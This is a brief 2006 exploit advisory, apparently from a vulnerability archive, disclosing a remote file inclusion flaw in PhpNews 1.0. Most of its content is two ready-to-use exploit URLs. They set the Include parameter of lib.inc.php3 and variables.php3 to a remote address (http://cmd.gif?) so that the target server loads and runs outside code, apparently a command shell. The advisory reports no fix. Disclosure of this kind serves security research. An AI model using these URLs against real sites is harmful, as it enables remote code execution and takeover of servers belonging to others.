PhpNews 1.0 (Include) Remote File Include Vulnerabilities

2006-09-07 00:00:00

########################################################################
# PhpNews v1.0 Remote File Inclusion Vulnerability
#
# Download: ftp://ftp1.comscripts.com/PHP/36_phpnews-10.zip
#
# Found By: the master
#
########################################################################
# exploit:
#
# http://[Target]/[Path]/Include/lib.inc.php3?Include=http://cmd.gif?
# http://[Target]/[Path]/Include/variables.php3?Include=http://cmd.gif?
########################################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.